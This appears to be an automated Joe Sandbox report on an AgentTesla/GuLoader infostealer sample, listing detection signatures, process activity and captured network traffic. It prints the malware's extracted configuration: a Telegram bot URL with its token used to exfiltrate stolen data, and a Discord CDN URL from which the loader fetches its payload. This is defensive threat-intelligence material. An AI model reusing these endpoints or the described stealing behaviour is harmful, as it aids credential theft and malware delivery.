Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
Analysis ID:679043
MD5:1e0bf9be9a0e840d758e3e43d44b400d
SHA1:e8e099bc702aeb950962757ba68833c5a4975ab8
SHA256:a111e841a0b8bdac6578b44d096d159b430c18f8e7a3103ae8881375e11b8496
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Contains functionality to register a low level keyboard hook
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe (PID: 5528 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" MD5: 1E0BF9BE9A0E840D758E3E43D44B400D)
    • CasPol.exe (PID: 624 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 1500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
{"Payload URL": "http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin"}
{"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.37843137887.000000001D8D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.32918874491.0000000001120000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 6 entries
            No Sigma rule has matched
            Timestamp:192.168.11.20149.154.167.220497954432851779 08/05/22-05:06:58.762892
            SID:2851779
            Source Port:49795
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeVirustotal: Detection: 10%Perma Link
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeReversingLabs: Detection: 23%
            Source: 00000003.00000000.32918874491.0000000001120000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin"}
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe.5528.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
            Source: CasPol.exe.624.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0153D808 CryptUnprotectData,3_2_0153D808
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0153DEF0 CryptUnprotectData,3_2_0153DEF0
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.11.20:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49795 version: TLS 1.2
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

            Networking

            barindex
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49795 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: Malware configuration extractorURLs: http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76b5bf10022bHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76b6c46d8ffcHost: api.telegram.orgContent-Length: 21528Expect: 100-continue
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
            Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
            Source: CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000003.00000002.37845047097.000000001D993000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37844105160.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bLCeYs.com
            Source: CasPol.exe, 00000003.00000002.37820741378.000000000124B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bi
            Source: CasPol.exe, 00000003.00000002.37822179697.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.33029516282.00000000012E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000003.00000003.33029516282.00000000012E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000003.00000002.37843863895.000000001D90F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000003.00000002.37841354468.000000001D821000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37844105160.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://w63iRikKzWaGjZ.org
            Source: CasPol.exe, 00000003.00000002.37841354468.000000001D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://w63iRikKzWaGjZ.orgt-gl
            Source: CasPol.exe, 00000003.00000002.37844926209.000000001D978000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37843863895.000000001D90F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000003.00000002.37843863895.000000001D90F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument
            Source: CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----
            Source: CasPol.exe, 00000003.00000002.37820741378.000000000124B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
            Source: CasPol.exe, 00000003.00000002.37821433832.00000000012A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.b
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/8
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000003.00000002.37841354468.000000001D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000003.00000002.37844637517.000000001D953000.00000004.00000800.00020000.00000000.sdmp, Cookies.3.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies.3.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: unknownHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76b5bf10022bHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.11.20:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49795 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01741010 SetWindowsHookExW 0000000D,00000000,?,?3_2_01741010
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00406D5F1_2_00406D5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_71461BFF1_2_71461BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AD3501_2_034AD350
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AB74A1_2_034AB74A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A137E1_2_034A137E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B7E1_2_034A2B7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B761_2_034A2B76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A138E1_2_034A138E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B8E1_2_034A2B8E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A13861_2_034A1386
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B861_2_034A2B86
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A139E1_2_034A139E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B9E1_2_034A2B9E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A13961_2_034A1396
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2B961_2_034A2B96
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A13A61_2_034A13A6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A4A1_2_034A2A4A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12421_2_034A1242
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A421_2_034A2A42
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A521_2_034A2A52
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349D2781_2_0349D278
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A121A1_2_034A121A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12171_2_034A1217
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A122A1_2_034A122A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A2A1_2_034A2A2A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12221_2_034A1222
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A123A1_2_034A123A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A3A1_2_034A2A3A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12321_2_034A1232
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2A321_2_034A2A32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12CA1_2_034A12CA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2ACE1_2_034A2ACE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12C21_2_034A12C2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2ADE1_2_034A2ADE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2AD61_2_034A2AD6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2AEE1_2_034A2AEE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12E21_2_034A12E2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2AE61_2_034A2AE6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2AFE1_2_034A2AFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2AF61_2_034A2AF6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A5A9C1_2_034A5A9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12BB1_2_034A12BB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AD2B21_2_034AD2B2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A12B71_2_034A12B7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A114B1_2_034A114B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A114E1_2_034A114E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A115E1_2_034A115E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A515F1_2_034A515F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A11561_2_034A1156
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A116E1_2_034A116E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A21621_2_034A2162
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A11661_2_034A1166
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A117E1_2_034A117E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A11761_2_034A1176
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AE1ED1_2_034AE1ED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349D9FF1_2_0349D9FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A51821_2_034A5182
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A11861_2_034A1186
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A519A1_2_034A519A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A299B1_2_034A299B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349C99B1_2_0349C99B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A10F61_2_034A10F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034B07661_2_034B0766
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A170B1_2_034A170B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A171E1_2_034A171E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A17361_2_034A1736
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AF7D11_2_034AF7D1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AC7971_2_034AC797
